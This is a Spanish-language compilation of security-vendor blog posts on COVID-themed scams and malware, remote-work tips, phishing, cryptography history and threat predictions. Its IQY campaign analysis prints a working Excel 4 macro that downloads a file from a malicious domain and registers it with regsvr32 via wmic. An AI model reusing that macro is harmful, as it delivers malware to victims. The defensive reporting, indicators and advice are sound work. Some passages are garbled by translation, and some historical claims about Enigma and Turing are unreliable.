Oportunistas del coronavirus: ¿cómo se aprovechan los cibercriminales?

Oportunistas del coronavirus: ¿cómo se aprovechan los cibercriminales?

En tiempos de crisis siempre hay oportunistas que tratan de aprovecharse de la situación. Esto también ocurre con la actual pandemia del coronavirus COVID19. De hecho, los expertos de Hornetsecurity observan cada vez más campañas que se desarrollan con bastante frecuencia. Actualmente, el porcentaje de correos electrónicos maliciosos que contienen enlaces usando el tema del coronavirus se está disparando.

A continuación, describiremos cómo la situación actual de crisis está sirviendo cada vez más a los ciberdelincuentes como gancho para el fraude, así como para la propagación de spam y malware.

 

 

En comparación con la cantidad total de correos electrónicos clasificados como maliciosos por Hornetsecurity, la cantidad de correos electrónicos que usan el tema del coronavirus sigue siendo pequeña, pero en aumento.

Para dar a los lectores una idea de cómo los ciberdelincuentes están explotando la crisis del coronavirus COVID19 con diversas actividades, el Security Lab de Hornetsecurity explicará a continuación algunas de sus observaciones diarias:

 

Análisis

Observaremos tres actividades:

– Scams
– Spam
– Malware

 

Sextorsiones chantajistas usando el COVID19 para sus estafas

En primer lugar, nos fijaremos en las estafas: una estafa que se mantiene en el tiempo es la sextorsión. En estas estafas de sextorsión, una víctima recibe un correo electrónico afirmando que su ordenador ha sido hackeado y que le han grabado en video mientras visitaba una web porno. Con el fin de evitar que este vídeo se comparta con los amigos y familiares de la víctima debe transferir una cantidad en criptomonedas (generalmente Bitcoin) a una dirección Bitcoin específica. Obviamente, el ordenador de la víctima no se ha visto comprometido y no se ha tomado ningún vídeo.

Un grupo de actividades fraudulentas que el Security Lab de Hornetsecurity viene observando y que está involucrado en tales estafas de sextorsión. Se ha hecho pasar por la OMS y pide a las víctimas donaciones usando como gancho el tema del coronavirus.

A continuación, puedes ver algunos de estos tipos de correos electrónicos fraudulentos:

 

 

Otro tipo de fraude que se está dando, es el de pedir Bitcoins con la excusa de que quieren proteger a la víctima para no propagar el virus:

 

En el siguiente gráfico se puede ver que el aumento de la actividad va relacionado a la estafa de la OMS que utiliza las direcciones Bitcoin 16gmYrbqMr4SZeA7SqNVmirhnhDG3maYPK y 13Rfk6FXkqswaYnqMys5BkiDvJbwVdL8TD (color azul y rojo) mientras que la estafa hacia arriba pidiendo BTC utiliza BTC utiliza BTC utiliza BTC utiliza 18P3S6DuNUpW2WLozsrrW6rRd6xh24Rc7N (en verde):

 

 

Se pueden observar, otros grupos de actividades que todavía siguen en su línea sin usar el tema del coronavirus. Pero ¿por qué las estafas clásicas de sextorsión siguen todavía en uso?

 

Spam de máscaras N95/FFP3 

A continuación, echamos un vistazo a los spammers. Estos grupos generalmente intentan vender los productos o servicios receptores, o intentan generar tráfico para sitios web (SEO ilícito) o aumentar el interés en las acciones (manipulación del mercado).

Aquí está claro qué productos relacionados con la crisis del coronavirus son propensos a spam – máscaras. Muchos de ellos:

 

El gráfico que aparece a continuación, muestra no sólo la diversidad de diferentes máscaras que se anuncian, sino que también el volumen general de estos correos electrónicos – no deseados – está aumentando:

 

 

Distribución masiva de Malware

Por último, pero no menos importante, las actividades que distribuyen malware también están monitorizando correos electrónicos relacionados con el tema del coronavirus. Por ello, presentamos información sobre un grupo de actividad de amenazas que se ha observado distribuyendo Formbook [1], Loki Bot [2], Agent Tesla [3] y AZORult [4] malware dentro de varios archivos (ZIP, RAR, ACE, ISO, GZ, …) como adjuntos a correos electrónicos.

Mientras que los expertos del Security Lab de Hornetsecurity han rastreado esta actividad, el 17 de marzo de 2020 algunos correos electrónicos pertenecientes a este grupo de actividades comenzaron a usar «Coronavirus» o «Covid-19» en el asunto o en los nombres de los archivos adjuntos. Esta tendencia sigue aumentando, como se puede ver en el siguiente gráfico, que muestra los correos electrónicos de este grupo de actividades. Los que no usan el tema del coronavirus aparecen en verde y correos electrónicos que usan el tema de coronavirus, aparecen en rojo:

 

 

Conclusión y reparación

En general, el riesgo de amenaza que tienen este tipo de actividades para la economía es el mismo que antes de la crisis. Los ciberdelincuentes siguen utilizando los mismos esquemas y mecanismos.

Sin embargo, es muy probable que las víctimas potenciales sean más propensas a caer en las prácticas fraudulentas en vista de la situación actual. Otro aspecto que no debe descuidarse es que los correos electrónicos que abordan temas sensibles en tiempos de crisis también abordan los aspectos psicológicos de sus víctimas e incluso pueden agregar una tensión adicional sobre ellas.

Un buen sistema de filtrado de correo electrónico debe evitar que estos correos electrónicos lleguen a los buzones de los usuarios finales, independientemente de si contienen una referencia al coronavirus o no.

Spam and Malware Protection de Hornetsecurity ofrece las tasas de detección más altas del mercado con una detección de spam garantizada del 99,9 % y una detección de virus del 99,99 %. Esto significa que incluso los oportunistas que quieren explotar la crisis del coronavirus no tienen posibilidad alguna de colarse en los buzones de los usuarios finales y causar daños.

 

Referencias:

¿Brechas de seguridad durante el teletrabajo? El desafío de la ciberseguridad en tiempos de crisis

¿Brechas de seguridad durante el teletrabajo? El desafío de la ciberseguridad en tiempos de crisis

El número de infecciones por Coronavirus está aumentando cada día de manera dramática, por ello hemos tenido que tomar medidas drásticas. Tiendas, restaurantes y otros muchos lugares públicos están cerrados para evitar la propagación del virus.  Los empleados de miles de empresas están teletrabajando. Durante esta situación extraordinaria y a veces abrumadora, las empresas y los empleados no deberían tener que enfrentarse a temores adicionales sobre la ciberseguridad en su hogar. Hornetsecurity tiene algunas recomendaciones para esto.

El progreso de la digitalización y el desarrollo de nuevas tecnologías ya ha traído muchos cambios para la economía en todo el mundo. La computación en la nube, el big data, la robótica y la inteligencia artificial ofrecen a las empresas ventajas como la optimización de procesos, la capacidad de ahorrar recursos y el intercambio rápido de datos e información. Se han creado nuevas empresas y puestos de trabajo como consecuencia de estos desarrollos. Además, muchos empleados ahora pueden realizar sus tareas sin que importe  su ubicación, mientras continúan comunicándose con sus jefes y compañeros. Como resultado, la mayoría de las empresas hacen posible que sus empleados trabajen desde casa.

Microsoft Office 365 se considera como un importante impulsor del trabajo colaborativo a través de la nube. Los archivos importantes se pueden almacenar e intercambiar desde cualquier lugar en tiempo real. Esto hace que trabajar desde casa sea aún más fácil. En tiempos de crisis, tener empleados trabajando desde casa es a menudo la única manera para que las empresas garanticen la seguridad de su fuerza de trabajo mientras mantienen las operaciones comerciales. Tanto los empleadores como los empleados se enfrentan a grandes desafíos por este cambio. Las preguntas más frecuentes giran en torno al tema de la seguridad de TI:

  • ¿Cómo se puede proteger la infraestructura de TI corporativa cuando los empleados trabajan desde el hogar?
  • ¿Tienen que tomar medidas específicas las empresas y los empleados?
  • ¿Siguen estando activos los mecanismos de protección, como los filtros de spam y virus mientras teletrabajamos?

Los siguientes son algunos consejos con respecto a las precauciones de seguridad que podrían ser utilizados durante el teletrabajo para garantizar la protección de los datos internos de la empresa. También discutimos las medidas de seguridad especiales para Office 365, ya que los usuarios del servicio en la nube de Microsoft son cada vez más el blanco de los hackers y cómo los ciberdelincuentes se están aprovechando del miedo a la propagación de COVID-19 y la distribución de correos electrónicos de phishing y sitios web falsos con el fin de obtener contraseñas, nombres de usuario y direcciones de correo electrónico.

Según los expertos en ciberseguridad de Hornetsecurity, se deben tomar y considerar las siguientes precauciones en el domicilio:

  • Uso de un servicio VPN para que los empleados puedan establecer una conexión segura con la red de la empresa (seguridad perimetral).
  • Instalación de las actualizaciones más recientes para sistemas operativos y aplicaciones.
  • Restringir los derechos de acceso de las personas que se conectan a la red corporativa
  • Todos los dispositivos corporativos; incluidos los smartphones y portátiles, deben estar protegidos por el software de seguridad adecuado. Idealmente, esto incluirá funciones de borrado de datos para dispositivos reportados como perdidos o robados, separación de datos personales y profesionales, y restricciones en la instalación de aplicaciones.
  • Formación a los empleados para informar sobre los peligros que pueden estar asociados con mensajes no solicitados.
  • Los usuarios de Office 365 son el objetivo principal de los ciberdelincuentes, especialmente en estos momentos de crisis. Por lo tanto, los expertos en ciberseguridad recomiendan no depender únicamente de los mecanismos de protección de Microsoft, sino de proteger además las cuentas de Office 365 con soluciones de terceros. (Leer más)

Los hackers utilizan la crisis para lanzar ataques cibernéticos dirigidos:

Desde principios de febrero, el Security Lab de Hornetsecurity ha estado monitoreando varias campañas de correo electrónico de phishing destinadas a aprovechar direcciones de correo electrónico y contraseñas o contrabandear malware en los sistemas de los destinatarios a través de enlaces y documentos adjuntos. El malware puede ser ransomware o spy software.  Aquí, puedes encontrar más información sobre los métodos de los hackers.

Para obtener una visión general de la difusión mundial del Coronavirus, la gente está accediendo al «mapa de Coronavirus» interactivo creado por la Universidad John Hopkins. Durante los últimos días, una versión falsa de este sitio web ha estado circulando en Internet e instalará malware en los ordenadores de los usuarios.

Los expertos en ciberseguridad de Hornetsecurity asumen que las estafas sobre el Coronavirus continuarán aumentando en un futuro próximo. Esperamos, por ejemplo, correos electrónicos falsos de autoridades sanitarias e instituciones gubernamentales similares o correos electrónicos de phishing de supuestas organizaciones benéficas que piden donaciones para hospitales e instalaciones médicas de emergencia.

Somos conscientes de que es extremadamente importante comunicarse de forma fiable y segura, especialmente en tiempos de crisis. Por lo tanto, nos gustaría aprovechar esta oportunidad para informar a nuestros clientes de que, a pesar de la situación excepcional actual, nuestros servicios seguirán garantizando la seguridad integral de su comunicación por correo electrónico.

Si tiene más preguntas, estamos encantados de responderlas en cualquier momento.

Campaña misteriosa de spam: análisis de seguridad

Campaña misteriosa de spam: análisis de seguridad

Aunque el mal uso de Excel Web Query (IQY) para la propagación de malware no es nada nuevo [1], un caso reciente ha desconcertado no sólo a los investigadores del Security Lab de Hornetsecurity, sino también a otros analistas de seguridad [3][6]. Una campaña de spam de correo electrónico en la que se entregan documentos de Excel malignos en archivos comprimidos. Una vez realizado el análisis en los ordenadores por los expertos en ciberseguridad, la aplicación de la calculadora de Windows se inicia automáticamente. Los analistas suponen que los atacantes pueden estar tratando de desviar la atención de la intención real del documento malicioso que se entregó a las víctimas. En este informe, el Security Lab de Hornetsecurity,  llega al fondo del caso.

El procedimiento

Los documentos maliciosos se distribuyen como archivos adjuntos zip llamados invoice*.xls.zip, siendo la parte * la única variable. El mensaje de correo electrónico adjunto es muy breve, a veces sin y otras con saludo, pero siempre con una referencia al archivo adjunto sin ningún texto adicional:

Tan pronto como se abre el documento, aparece un pop up con un falso mensaje de diálogo que dice: «Encontramos un problema con el contenido. ¿Quiere intentar recuperar lo máximo posible?»:

Luego el documento utiliza Excel Web Query para descargar código de macro adicional desde una ubicación remota. Uno de esos códigos de macros observados descargó y ejecutó un archivo ejecutable (identificado como w32-dll-run-shellcode.dll), que a su vez ejecutó la aplicación de calculadora de Windows calc.exe.

El Security Lab de Hornetsecurity asume que este no era o es el objetivo previsto. Sin embargo, la investigación de la OSINT y la correlación con otras fuentes indican que el único programa recargado era w32-dll-run-shellcode.dll. No se sabe si en algún otro momento se entregó un archivo recargado malicioso en lugar del w32-dll-run-shellcode.dll. Tampoco se sabe si w32-dll-run-shellcode.dll fue/está entregado intencionalmente o por error.

Análisis técnico

El documento

El documento tiene una hoja oculta:

En esta tabla oculta en las celdas, el código macro para el pop up engañoso descrito anteriormente puede verse:

Cuando se ejecuta el documento sin Internet, se muestra un error con la URL maliciosa que debería haberse cargado:

Si el documento se ejecuta en Internet emulada y la consulta recibe una respuesta genérica, se informa de un error de consulta en la Web:

Sabiendo esto, las conexiones de datos de la carpeta pueden ser examinadas para revelar la cadena de conexión de la consulta Web:

Desafortunadamente, el Archivo de Consulta Web de Excel (IQY) no pudo ser cargado y las conexiones HTTP fueron redirigidas a https://www.google.com/ usando un código 301. Es una técnica conocida para negar a los investigadores de seguridad informática el acceso al objetivo. Esto podría basarse en rangos de direcciones IP o en el llamado geofencing, de modo que sólo las redes de víctimas previstas tengan acceso al objetivo verdadero, o la URL sólo podría permitir un cierto número de descargas del objetivo antes de la redirección.

Se sabe por otras fuentes que se devolvió una solicitud de consulta web de Excel:

Mientras que los comandos =CLOSE(FALSE) le indican a Excel que cierre la tabla, hemos examinado más a fondo la base URL /lander/excel4_158158672/index.html. Sin embargo, también fue redirigido a https://www.google.com/.
  Finalmente, /lander/excel4 devuelve el siguiente macro de Excel 4:
=CALL(«urlmon»,»URLDownloadToFileA»,»JJCCJJ»,0,»https://merystol.xyz/SDVsdv23r»,»c:\\Users\\Public\\fbafb4234.html»,0,0)
=IF(ALERT(«The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.»,2), WAIT(NOW()+»00:00:01″), )
=EXEC(«wmic process call create «»regsvr32 -s c:\\Users\\Public\\fbafb4234.html»»»)
=CLOSE(FALSE)

Esta macro descarga un archivo de https://merystol.xyz/SDVsdv23r a c:\\\usuario\\publico\\fbafb4234.html via urlmon.URLDownloadToFileA. Entonces regsvr32 a través de la llamada de proceso wmic creada para registrar sigilosamente (-s switch) el DLL descargado.

Y aquí es donde el caso se vuelve extraño: mientras que la anterior URL https://merystol.xyz/SDVsdv23r fue redirigida a https://www.google.com/ durante nuestro análisis, en VirusTotal se puede ver que en un momento dado la URL cargó un archivo con el hash 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb lud [2].

El w32-dll-run-shellcode.dll es muy simple, no contiene importaciones y apenas tiene una secuencia de caracteres:

$ strings 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb.bin
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.reloc
RhcalcTYRQd
WinEu
w32-dll-run-shellcode.dll
_DllMain@12

El Githubtribution a través de la cadena w32-dll-run-shellcode.dll conduce a https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/build_config.py (un clon del proyecto original en https://code.google.com/archive/p/win-exec-calc-shellcode/). El código en cuestión es idéntico a https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/w32-exec-calc-shellcode.asm. Es un viejo código PoC de un agresivo investigador de seguridad que ejecuta calc.exe.

La descarga de este w32-dll-run-shellcode.dll también fue observada por otros investigadores [3].

El mismo w32-dll-run-shellcode.dll también estaba disponible en https://brinchik.xyz/Qz8ZNnxg [4]. Un esquema de nombres de dominio y URL que coincide con el malware observado aquí. La misma URL se redirige a una URL descargando Ursnif. Esto fue previamente verificado por otro investigador [5]. Esto significa que es probable que la ejecución de calc.exe sea un movimiento calculado por los atacantes para distraer del análisis el objetivo real. No se puede determinar en este momento si esta campaña está relacionada con Ursnif y quién está detrás de ella.

Entrega

 

 

Los correos electrónicos se envían desde cuentas de correo real aol.com (89%) y wp.pl (11%). Por lo tanto, los correos electrónicos de aol.com también pasan la validación de la DMARC. No pudimos observar ninguna reutilización de las direcciones de correo electrónico, es decir, la entrega se programó definitivamente para asegurar que se utilizara un único correo electrónico del remitente para cada envío. Sin embargo, los hackers no se dirigieron a ningún sector o industria específica.

Los correos electrónicos fueron entregados el 14.02.2020, 19.02.2020, 20.02.2020 y 21.02.2020:

Los nombres de los remitentes siguen el patrón firstname.lastname[0-9a-z]{0,5}@(aol.com|wp.pl).

El bajo volumen de correo electrónico también podría indicar que se trata de una primera prueba o demostración de un nuevo tipo de documento malicioso que utiliza consultas web de Excel.

Conclusión y recomendaciones

 

Esta campaña utiliza macros de Excel 4 y consultas web de Excel para ejecutar y desplegar un malware de segunda fase, aún desconocido. Esto probablemente permite eludir algunos mecanismos de defensa que sólo buscan macros VBA. Todavía se desconoce exactamente qué carga útil se entrega y si la entrega del malware de la 2ª etapa, que simplemente abre la aplicación informática, está diseñada como una solución de análisis o como un error. Sin embargo, el tiempo empleado en el envío del correo electrónico y las redirecciones a Google a través de la URL del objetivo indica que se trata de un desvío calculado.

    Los usuarios pueden protegerse de este tipo de documentos maliciosos de la siguiente manera:
  • Desactivando macros y contenido remoto en Office.
  • No habilitando la funcionalidad de edición o de macro, aunque lo indique un documento.
Hornetsecurity ya está bloqueando este tipo de campaña maliciosa y el Security Lab sigue vigilando la situación.

Indicadores de Compromiso (IOCs)

Hashes
SHA256Description
018902c1bbfe41581710c5efad2a2c9f516bd7aa98dc8432584520623e7eb2bcDocument
6dcc25eb214c38bc942ffdbe8680a1dec867ac4780aac7262391298d561b5928Document
822054123910494bbb80cc4e46f79f045cc527dc12d89bda4b8b58bd9be417f7Document
dc778302fefac2735c112311736e2050eef7a2b84b1e1569b0456e8349d0715cDocument
e1bf01178976efeedcd277f83bebc02f8f4d687d7348d906950a0a524f3f1a98Document

DNSs

  • doolised.xyz
  • emmnebuc.xyz
  • merystol.xyz
  • veqejzkb.xyz

MITRE ATT&CK técnicas

 

TácticaIDNombreDescripción
Acceso InicialT1193Spearphishing AttachmentManda email para obtener acceso inicial.
EjecuciónT1204User ExecutionLa víctima ejecuta la carga.
EjecuciónT1047Windows Management InstrumentationWMI se usó para ejecutar la carga de la segunda etapa de la carga útil.
Defensa EvasiónT1117Regsvr32Ejecución del proxy de la carga útil de la segunda etapa.

 

 

 

El coronavirus – También un peligro vía email

El coronavirus – También un peligro vía email

Hornetsecurity advierte de ataques de phishing y malware en nombre de organizaciones sanitarias

Cada día aparecen informes de nuevos casos de infección por el terrible coronavirus. Las imágenes de ciudades y personas en cuarentena pintan un escenario de terror. Pero no es sólo en el mundo analógico donde el virus es un riesgo: la creciente inseguridad es explotada descaradamente por los ciberdelincuentes con campañas de phishing y malware dirigidos. También hay un alto «riesgo de contagio» a través de correo electrónico.

El Security Lab de Hornetsecurity ha estado observando un aumento en el número de correos electrónicos enviados en nombre de la Organización Mundial de la Salud (OMS) y los Centros para el Control y la Prevención de Enfermedades desde principios de febrero. Las noticias en inglés se aprovechan explícitamente del miedo de la gente al virus.

Por ejemplo, se ofrece un enlace con una supuesta lista de nuevos sospechosos en el área circundante a la que se accedería si se proporcionara una dirección de correo electrónico y una contraseña. Este es un correo electrónico de phishing clásico diseñado para interceptar datos confidenciales. En otros casos, se ofrece un enlace de descarga o un documento adjunto. Ambos prometen información sobre las medidas de seguridad para protegerse contra la infección.

Si se hace clic en el vínculo o se abre el documento, se volverá a cargar un archivo malintencionado. Existe el riesgo de que esto infectará el sistema de TI con un virus o ransomware.    

Los hackers utilizan los temas de actualidad

Los expertos en TI de Hornetsecurity señalan que los eventos actuales con gran importancia emocional se utilizan cada vez más como gancho para campañas de phishing y malware a gran escala. Al sensibilizar a la gente sobre estos problemas, los correos electrónicos de los ciberdelincuentes reciben más atención y parecen más creíbles. La probabilidad de la gente abra el email aumenta.

El correo por coronavirus es sólo uno de los muchos casos recientes. Ataques por correo similares también fueron interceptados por Hornetsecurity en las protestas climáticas iniciadas por Greta Thunberg, el RGPD (GDPR) y los incendios forestales en Australia.

Dado que la comunicación por correo electrónico corporativo sigue siendo la puerta de entrada número uno a los ciberataques, los empleados deben ser conscientes de esto, además de construir mecanismos de protección eficaces. Detectar correos electrónicos de phishing no es fácil, pero tampoco es imposible. Se deben revisar los siguientes puntos:

  • La  vista detallada de la dirección de correo electrónico del remitente puede revelar el verdadero origen del mensaje. Si esto no es plausible, contiene números crípticos, se trata de una señal de advertencia.
  • A menudo, las campañas  de phishing a gran escala utilizan solo una dirección general del destinatario.
  • La ortografía  y la gramática incorrectas, así como un  diseño no profesional, también son una indicación.
  • El esfuerzo de presionar a la víctima juega un papel crucial. De esta manera, la reflexión crítica debe ser socavada.
  • A menudo los ciberdelincuentes tratan de conseguir que el destinatario abra una URL.  Los archivos adjuntos de correo electrónico también pueden conllevar riesgos.
Un viaje a través de la historia de la criptografía – Parte 1

Un viaje a través de la historia de la criptografía – Parte 1

Criptografía Parte 1: el pasado

 

¿La historia interminable? La vulneración en la protección de datos en las principales empresas domina los titulares de los periódicos de todo el mundo. Se ha convertido en un tema recurrente en la presentación de informes, además las empresas también son cada vez más conscientes de la necesidad de proteger los datos confidenciales del acceso de terceros. El Ponemon Institute ha observado un aumento constante en la implementación de estrategias de cifrado de empresas en los últimos 14 años.

Las regulaciones legales, especialmente dentro de Europa, obligan a las empresas a utilizar servicios de cifrado. Un factor importante aquí es el Reglamento General de Protección de Datos (RGPD) o GDPR, que se aplica desde mayo de 2018. Los datos personales deben cifrarse tan pronto como se transmiten a través de Internet o se almacenan en la nube, mientras que la comunicación cifrada apenas se consideraba en absoluto hace unos años, actualmente está «de moda».

 

Es importante tener en cuenta que el cifrado  no es una invención moderna. Desde un punto de vista histórico, los comienzos se remontan a hace siglos, como sabemos el comandante romano Cayo Julio César ya intercambió mensajes cifrados con sus líderes militares. En este artículo, echaremos un vistazo al pasado para entender mejor la criptografía de hoy.

Antes de entrar en nuestra máquina del tiempo, sujetar vuestros cinturones para salir a la caza de pistas, queremos informaros que los efectos secundarios como náuseas, dolores de cabeza y confusión pueden ocurrir durante este viaje. Intentaremos proporcionar el mejor servicio posible durante tu viaje a través de la historia de la criptografía. ¡Abróchense los cinturones!

Encubrimiento histórico – también conocido como: jugo de limón en pergamino

 

En el año 480, estamos en la mitad de la Antigüedad. Los comandantes romanos compiten por el gobierno del reino romano. Las intrigas, asesinatos y otras actividades fraudulentas deben ser planeadas y ejecutadas. Pero ¿cómo se puede transmitir un asesinato de este tipo sin ser detectado? ¿Has oído hablar de jugo de limón en pergamino? Representaba un canal de comunicación secreto clásico.

El texto estaba escrito en pergamino usando jugo de limón. Después de que el jugo de limón se secaba, el pergamino daba la impresión de una hoja en blanco. El destinatario del mensaje todavía podía decodificar el mensaje muy fácilmente. Por ejemplo, en aquellos días sostenía una vela detrás del pergamino y así era capaz de hacer visible el jugo de limón y leer el mensaje.

Además, había varios otros métodos que se utilizaban en la Antigüedad.  Se usaban esclavos para afeitarles el pelo de la cabeza, tatuar el mensaje en la parte posterior de sus cabezas y esperar a que el cabello creciera de nuevo para entregar el mensaje al receptor legítimo. Sin lugar a dudas, este era uno de los medios de comunicación más radicales, y tampoco era adecuado para mensajes urgentes.

Los procedimientos que acabamos de describir pertenecen a la esteganografía, que es claramente distinguible de la criptografía. La esteganografía se basa en la esperanza de que un «extranjero» no se dé cuenta de que dos partes privadas se están comunicando entre sí.

Inicios de la criptografía: Astérix y Obelix visitando a César

 

En lugar de la esteganografía, la comunicación criptográfica ocurre entre dos o más interlocutores y el lenguaje  puede ser visible, pero sigue siendo confidencial. Sólo la información en sí no es visible para los extranjeros, a través del cifrado del mensaje.

Situémonos en Roma. Vamos a sumergirnos en el mundo de los galos y romanos.

Una popular técnica de cifrado fue desarrollada por una personalidad histórica muy conocida: Cayo Julio César. Conocido hoy como el cifrado César, el emperador romano posterior se comunicó con sus líderes militares a través de mensajes cifrados. Ni las personas no autorizadas ni el enemigo, en este caso los galos, conocían el propósito de los textos codificados. Pero a medida que pasaba el tiempo, este método de cifrado podía ser descubierto de diferentes formas.

El cifrado Caesar es un método de cifrado simétrico simple y se basa en una sustitución. Esto significa que cada letra utilizada en el mensaje se reemplaza por una nueva letra. La letra de sustitución resulta de un desplazamiento de letra dentro del alfabeto que se determina de antemano. Por ejemplo, un desplazamiento de tres dígitos. En este caso, «Gracias» se convierte en «Gdqnh». El descifrado de un disco de cifrado se utiliza a menudo para evitar tener que repetir constantemente el alfabeto. Con este tipo de cifrado, el destinatario solo tenía que ser informado de antemano con una clave secreta.

Una persona no autorizada inicialmente no podía obtener nada del mensaje sin la clave, pero una vez que ha pasado algún tiempo, es fácil descifrar el mensaje después de un promedio de 25 intentos. Esto se debe a que tuvieron que comprobar el alfabeto para descubrir el desplazamiento correcto de la letra. Los ordenadores de hoy tardarían menos de un segundo en hacer esto. Por lo tanto, el cifrado César ya no se considera seguro y ha sido reemplazado por métodos más recientes. ¿Preparados? Vamos a la Francia en el siglo XVI.

Criptografía Parte 1 - Descubre el origen del cifrado

Descubre el origen de la estenografía a través de la historia

 

De Roma a Francia

 

Uno de los métodos que reemplazó el cifrado César como una alternativa más segura fue el desarrollado por el diplomático y criptógrafo francés Blaise de Vigenére en el siglo XVI, también conocido como el cifrado Vigen-re. Es comparable al cifrado César, y también se basa en la sustitución de letras, pero utiliza varios alfabetos de texto cifrado.

El número de alfabetos que se utilizan está determinado por una clave. En lugar de un número, se elige una palabra clave, que se escribe bajo el mensaje cifrado. La palabra clave especifica el desplazamiento de letra por cada una de ellas. La primera letra de la palabra clave define el alfabeto para la primera letra del texto sin cifrar, la segunda letra de la palabra clave determina el alfabeto para la segunda letra del texto original.

 

Ejemplo de figura de Vigenére

 

Palabra clave: Presente Mensaje: “Le damos a Tom un vale para su cumpleaños”

“We give Tom a Voucher for his Birthday”

 

W E G I V E T O M A V O U C H E R F O R H I S B I R T H D A Y

P R E S E N T P R E S E N T P R E S E N T P R E S E N T P R E

 

La «P» ahora da un desplazamiento de letra de dieciséis letras, ya que la «P» está en la decimosexta posición en el alfabeto. La «R» cambia dieciocho letras y así sucesivamente. Así que el «NOSOTROS» se convierte en un «MW».

La seguridad de este método de cifrado está fuertemente relacionada con la longitud de la clave y si la clave se utiliza varias veces. Por lo tanto, la palabra clave de nuestro ejemplo no es realmente segura.

Sin embargo, algunos años más tarde este método de cifrado resultó ser fácilmente decodificado. Ahora echaremos un vistazo a otro método de cifrado que se consideró indescifrable durante mucho tiempo.

 

Enigma y la máquina de Turing

 

 

Hacemos una parada en Alemania en la década de 1930. Al igual que el cifrado César, los métodos de cifrado se utilizaron principalmente en un contexto militar. Por lo tanto, no es de extrañar que Alemania también hizo uso de la comunicación cifrada durante la Segunda Guerra Mundial. El aspecto especial de este tipo de cifrado era que se cifraba y descifraba mediante el uso de una máquina. La clave se modificó todos los días, por lo que perdió su validez después de 24 horas. Esa máquina se llama Enigma.

Enigma fue inventada por Arthur Scherbius en 1918 como una máquina especial para el cifrado y descifrado de rutina. El concepto operativo básico se remonta a los años de la Primera Guerra Mundial. La Primera Guerra Mundial se considera la primera guerra en la que la criptografía se utilizó sistemáticamente. Ya durante la guerra y en los años posteriores, se desarrollaron las primeras máquinas que ofrecían un nivel de seguridad significativamente mayor que los métodos manuales. Enigma fue ofrecido a la venta, pero fue recibido con muy poco interés tanto de la comunidad empresarial como de las agencias gubernamentales. No fue hasta 1933, cuando Hitler hizo que Enigma se convirtiera en parte del equipo estándar de los nacionalsocialistas. Pero, ¿cómo funciona exactamente esta extraña máquina?

A primera vista se asemeja a una máquina de escribir clásica, pero en su interior se esconde un sistema bastante complicado. El principio de funcionamiento se basa en circuitos eléctricos simples, cada uno de ellos conectando una tecla con una letra en el teclado a una luz eléctrica que ilumina una letra en la pantalla. Sin embargo, la «A» no está conectada a la «A» en el panel de visualización: todos los rodillos están entrelazados según un sistema específico. Por lo tanto, el mensaje sólo se puede decodificar si el destinatario conoce todos los ajustes del enigma transmisor.

Suena como un cifrado insuperable, ¿verdad? Pero fue descifrado por un informático británico en 1941. Alan Turing declaró la guerra a Enigma con una «máquina de Turing«  auto desarrollada  y finalmente ganó. Los historiadores afirman que esta máquina puso fin a la Segunda Guerra Mundial prematuramente y salvó millones de vidas.

 

Principio de criptografía moderna

 

Antes de que vuelvas a la oficina, queremos que llegues a una conclusión:

Como has aprendido en nuestras diversas fases, incluso los sistemas cuyo algoritmo de cifrado era conocido sólo por el receptor y el remitente fueron capaces de ser descifrados. Un principio de la criptografía moderna, también conocido como principio de Kerckhoff, establece que la fiabilidad de un método de cifrado (simétrico) se basa en la seguridad de la clave en lugar de en el secreto del algoritmo. Por lo tanto, es aconsejable utilizar algoritmos públicos que ya han sido suficientemente analizados.

Sin embargo, nuestro viaje a través de la historia de la criptografía no ha terminado con este artículo, porque una pregunta permanece abierta: ¿Hay métodos seguros para el cifrado? Continuará…

 

 

Las 5 principales ciberamenazas previstas para el 2020

Las 5 principales ciberamenazas previstas para el 2020

Le pedimos a nuestra Head of Product Management la Dra. Yvonne Bernard, que nos diera una evaluación desde el punto de vista de una experta acerca de las ciberamenazas que deberíamos tener en el radar para el 2020.

“El hecho de hacer una predicción sobre cuáles son las próximas grandes amenazas siempre será ambivalente:  por un lado, tengo acceso a grandes herramientas de análisis de datos que permiten hacer pronósticos a gran escala y nuestro propio laboratorio de seguridad me da todo tipo de detalles técnicos. Por otro lado, las predicciones también requieren una combinación de intuición, experiencia y confianza en sí mismo… Pero es una gran oportunidad para advertir a la gente con sólo mirar en la bola de cristal, y estoy dispuesta a asumir la tarea. Mi suposición general es que el correo electrónico seguirá siendo el vector de ataque número 1, especialmente para el tipo de clientes de negocios que protegemos diariamente. Dicho esto, mi primera predicción de amenaza podría sorprenderte:

 

 

 

 

1. Dispositivos IoT hackeados

 

Espero que los ataques a los dispositivos de IoT aumenten aún más en 2020. Estos dispositivos son baratos e incluso útiles en un escenario de industria 4.0 o de digitalización. A menudo carecen de gestión de parches y se basan en sistemas operativos abiertos estándar con usuarios o administradores predeterminados bien conocidos (por ejemplo, opeHAB para Rasberry Pi). Mi preocupación en tal escenario, es que no es sólo un hacker chino el que apaga tu máquina de café: estos millones de dispositivos fáciles de hackear de diferentes IPs en todo el mundo son el caldo de cultivo perfecto para botnets como Reaper. DDoS y muchos más ataques a gran escala en todo el mundo pueden ser dirigidos a muchas pequeñas o grandes empresas o a infraestructuras críticas -usando dispositivos IoT hackeados en todo el mundo de forma gratuita.

 

2. Grandes ataques de exfiltración de datos con Ransomware as a service (RaaS)

 

Hemos visto antes al Ransomware como un servicio: las personas sin conocimientos de programación o de hacking pueden crear su propio malware. El malware construye kits como el de Filadelfia (se vende por 389 dólares) o el de Satanás actualmente activo (a través de un modelo de ventas de participación en los ingresos).

Esta y otras simplificaciones similares de los ataques de malware podrían aumentar los ataques a las pymes, ya que ahora es más barato y más fácil que nunca. El hecho de ser una empresa pequeña no te libera de ser una víctima potencial del cibercrimen, tampoco si eres una empresa grande.

